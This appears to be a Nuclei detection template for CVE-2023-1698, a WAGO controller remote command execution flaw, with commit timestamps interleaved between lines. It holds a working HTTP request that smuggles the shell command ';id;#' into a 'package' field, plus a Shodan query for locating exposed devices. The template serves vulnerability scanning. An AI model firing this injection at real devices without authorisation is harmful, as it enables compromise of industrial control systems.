2023-07-30 16:41:33 +00:00
id : CVE-2023-1698
info :
2023-08-02 08:17:13 +00:00
name : WAGO - Remote Command Execution
2023-08-01 09:34:14 +00:00
author : xianke
2023-08-31 11:46:18 +00:00
severity : critical
2023-07-30 16:41:33 +00:00
description : |
2023-08-02 08:17:13 +00:00
In multiple products of WAGO, a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behavior, Denial of Service, and full system compromise.
2023-09-06 11:43:37 +00:00
remediation : |
Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability.
2023-07-30 16:41:33 +00:00
reference :
- https://onekey.com/blog/security-advisory-wago-unauthenticated-remote-command-execution/
- https://nvd.nist.gov/vuln/detail/CVE-2023-1698
2023-08-31 11:46:18 +00:00
- https://cert.vde.com/en/advisories/VDE-2023-007/
2023-07-30 16:41:33 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2023-1698
cwe-id : CWE-78
2023-10-14 11:27:55 +00:00
epss-score : 0.56393
2023-10-16 10:55:14 +00:00
epss-percentile : 0.97284
2023-09-06 11:43:37 +00:00
cpe : cpe:2.3:o:wago:compact_controller_100_firmware:*:*:*:*:*:*:*:*
2023-07-30 16:41:33 +00:00
metadata :
max-request : 1
2023-08-31 11:46:18 +00:00
vendor : wago
product : compact_controller_100_firmware
2023-09-06 11:43:37 +00:00
shodan-query : html:"/wbm/" html:"wago"
2023-08-02 08:17:13 +00:00
tags : cve,cve2023,wago,rce
2023-07-30 16:41:33 +00:00
http :
- raw :
- |
POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
{"package" : ";id;#" }
matchers-condition : and
matchers :
- type : word
part : body
words :
- '"license":'
2023-08-02 08:17:13 +00:00
- '"name":'
- 'uid='
- 'gid='
2023-07-30 16:41:33 +00:00
condition : and
- type : status
status :
- 200